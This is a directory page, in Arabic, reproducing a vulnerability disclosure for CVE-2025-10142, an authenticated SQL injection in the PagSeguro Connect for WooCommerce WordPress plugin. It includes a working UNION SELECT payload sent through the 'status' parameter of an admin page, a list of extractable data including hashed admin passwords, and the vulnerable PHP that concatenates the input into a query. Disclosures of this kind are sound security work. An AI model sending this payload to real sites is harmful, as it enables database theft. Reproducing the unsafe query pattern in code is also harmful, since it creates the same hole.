Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
PagSeguro-Connect-Para-WooCommerce-CVE-Report — الإفصاح عن CVE-2025-10142 | Kitploit
أدوات/GitHubGitHub/mooseloveti/pagseguro-connect-para-woocommerce-cve-report
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubmooseloveti/pagseguro-connect-para-woocommerce-cve-report

PagSeguro-Connect-Para-WooCommerce-CVE-Report

الإفصاح عن CVE-2025-10142

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
منذ 8 أشهرلم تتم المراجعة بعد

PagSeguro-Connect-Para-WooCommerce-CVE-Report

الإفصاح عن CVE-2025-10142

CVE-2025-10142 - ثغرة أمنية في PagSeguro-Connect-para-WooCommerce

يكشف هذا المستودع عن ثغرة تم اكتشافها في PagSeguro-Connect-para-WooCommerce <= 4.44.3، وهو إضافة ووردبريس طورها ريكاردو مارتينز.

🛠 النسخة المتأثرة

  • المنتج: PagSeguro-Connect-para-WooCommerce
  • الإصدار: v4.44.3
  • الرابط: https://wordpress.org/plugins/pagbank-connect/

🔒 CVE المخصص

CVE IDالنوعالمكونالتأثير
CVE-2025-10142حقن SQL مصادق عليه (مدير متجر+)src/Connect/Recurring/Admin/Subscriptions/SubscriptionList.phpيمكن لمهاجم مصادق عليه استخراج البيانات

🧾 وصف تفصيلي

CVE-2025-10142 — وصول غير مصرح به إلى قاعدة البيانات واستخراج البيانات

  • المكون المتأثر: صفحة إدارة rm-pagbank-subscriptions
  • متجه الهجوم: مصادق عليه (مدير متجر أو مسؤول) عبر طلب GET
  • طريقة التشغيل: عن طريق حقن SQL ضار في معامل status، يمكن للمهاجم استخراج بيانات حساسة من قاعدة البيانات عبر حقن SQL من نوع UNION.
root@kitploit:~
GET /wp-admin/admin.php?page=rm-pagbank-subscriptions&status=' UNION SELECT CAST(version() AS CHAR),2,3,4,5,6,7,8,9,10,11,12,13,14,15 -- -

  • التأثير: يتم تنفيذ SQL المحقون وتظهر النتائج في جدول HTML في صفحة الإدارة. أمثلة على البيانات القابلة للاستخراج تشمل:
    • version() → إصدار قاعدة البيانات
    • user() → مستخدم MySQL
    • database() → اسم قاعدة البيانات
    • SELECT user_login, user_pass FROM wp_users (بيانات اعتماد المشرف المُشفرة)
    • أي بيانات من wp_options، wp_usermeta، إلخ.

❓سبب الثغرة

يتم دمج معامل status مباشرة في استعلام SQL دون تهريب أو استخدام $wpdb->prepare()

root@kitploit:~
if (!empty($_REQUEST['status'])) {
           $status = sanitize_text_field(wp_unslash($_REQUEST['status']));
           $where .= " AND status = '$status'";
       }

$this->items = $wpdb->get_results(
           $wpdb->prepare(
               "SELECT * FROM {$wpdb->prefix}pagbank_recurring WHERE $where ORDER BY  $orderby $order LIMIT %d OFFSET %d",
               $per_page,
               ($current_page - 1) * $per_page
           ),
           ARRAY_A
       );
...


ひとこと

نظرًا لأن الهجوم ممكن من حساب مدير المتجر، فإن التهديد منخفض جدًا. كان تتبع المعالجة التي تُدخل المدخلات الخارجية في $where ثم تُستخدم $where مباشرة في بناء جملة SQL أمرًا صعبًا بعض الشيء.

🔍 المكتشف

الاسم: MooseLove
الدور: باحث أمني مستقل / صائد ثغرات
جهة الاتصال: متاحة عند الطلب


📚 المراجع

  • المنتج: https://wordpress.org/plugins/pagbank-connect/

⚠️ الترخيص

يتم تقديم هذا الإشعار للتوعية الأمنية العامة. يُسمح بالمشاركة مع الإسناد.

تنزيل الأداة